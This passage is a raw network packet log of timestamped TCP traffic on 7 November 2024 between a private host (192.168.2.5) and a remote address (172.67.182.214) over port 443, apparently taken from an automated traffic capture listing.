                                                                                                                                                                              Nov 7, 2024 18:04:43.575942993 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.575968027 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.575984955 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.579047918 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.672281027 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.672307014 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.672399044 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.672424078 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.672439098 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.672465086 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.695564985 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.695591927 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.695656061 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.695687056 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.695705891 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.695724010 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.813332081 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.813358068 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.813390970 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.813416004 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.813431025 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.813452959 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.861788988 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.861808062 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.861845970 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.861865997 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.861882925 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.861897945 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.932543993 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.932564974 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.932605028 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.932615995 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:43.932642937 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:43.932658911 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.023916006 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.023935080 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.023986101 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.024012089 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.024028063 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.024051905 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.051192999 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.051209927 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.051254988 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.051261902 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.051301003 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.051328897 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.147634029 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.147659063 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.147949934 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.147979975 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.148040056 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.170331001 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.170361042 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.170475006 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.170506001 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.170555115 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.266645908 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.266671896 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.266793013 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.266830921 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.266882896 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.290450096 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.290469885 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.290565014 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.290581942 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.290626049 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.381288052 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.381315947 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.381386042 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.381411076 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.381433010 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.381453991 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.409135103 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.409157991 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.409208059 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.409233093 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.409255028 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.409272909 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.499897003 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.499919891 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.500066042 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.500098944 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.500149012 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.528347969 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.528386116 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.528426886 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.528450966 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.528462887 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.528493881 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.617743969 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.617763996 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.617809057 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.617832899 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.617850065 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.617872000 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.674247980 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.674278975 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.674396992 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.674429893 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.674477100 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.675642014 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.675657988 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.675709009 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.675714016 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.675740004 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.675755978 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.742574930 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.742597103 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.742901087 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.742912054 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.742963076 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.792943954 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.792960882 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.793137074 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:44.793143988 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:44.793196917 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095333099 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095345020 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095379114 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095457077 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095479965 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095499992 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095505953 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095523119 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095524073 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095535040 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095562935 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095592022 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095778942 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095796108 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095834017 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.095841885 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.095876932 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.096004009 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.096029997 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.096052885 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.096059084 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.096096992 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.096115112 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.096118927 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.101386070 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.101414919 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.101459980 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.101474047 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.101506948 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.103353024 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.103374958 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.103410006 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.103430033 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.103447914 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.104286909 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.104312897 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.104345083 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.104357004 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.104379892 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.149359941 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.149382114 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.149425983 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.149454117 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.149473906 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.198864937 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.212174892 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.212198973 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.212369919 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.212369919 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.212397099 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.213038921 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.217561007 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.217578888 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.217628956 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.217657089 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.217730999 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.269061089 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.269092083 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.269160032 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.269187927 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.269202948 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.269356012 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.330754042 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.330785036 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.330828905 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.330854893 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.330874920 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.333141088 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.336314917 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.336333036 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.336397886 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.336421013 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.336461067 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.387701035 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.387726068 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.387777090 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.387799978 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.387829065 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.387846947 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.449738026 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.449764013 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.449830055 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.449851036 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.449871063 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.449886084 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.455035925 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.455090046 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.455104113 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.455125093 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.455147982 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.455167055 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.505379915 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.505399942 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.505489111 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.505526066 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.505578041 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.552432060 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.552450895 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.552531004 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.552551985 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.552687883 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.569147110 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.569216967 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.569376945 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.569376945 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.569386959 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.570841074 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.596182108 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.596198082 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.596276045 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.596282959 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.596322060 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.625519991 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.625536919 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.625623941 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.625629902 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.625679970 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.626234055 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.626296043 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.687284946 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.687342882 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.687635899 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.687640905 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.687876940 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.692354918 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.692375898 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.692452908 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.692456961 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.692513943 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.723727942 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.723746061 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.723849058 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.723855019 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.723900080 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.787065029 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.787086010 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.787215948 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.787241936 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.787292004 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.806087017 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.806106091 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.806288958 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.806296110 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.806343079 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.811412096 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.811482906 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.811528921 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.811533928 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.811562061 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.811572075 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.862704992 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.862766981 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.862778902 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.862796068 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.862818956 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.862834930 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.909296036 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.909373045 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.909404993 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.909421921 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.909435987 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.909461975 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.925226927 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.925245047 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.925304890 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.925311089 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.925348997 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.952102900 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.952124119 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.952167034 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.952172995 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.952275038 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.981620073 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.981637955 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.981693029 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:45.981699944 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:45.981745958 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.028426886 CET44349764172.67.182.214192.168.2.5
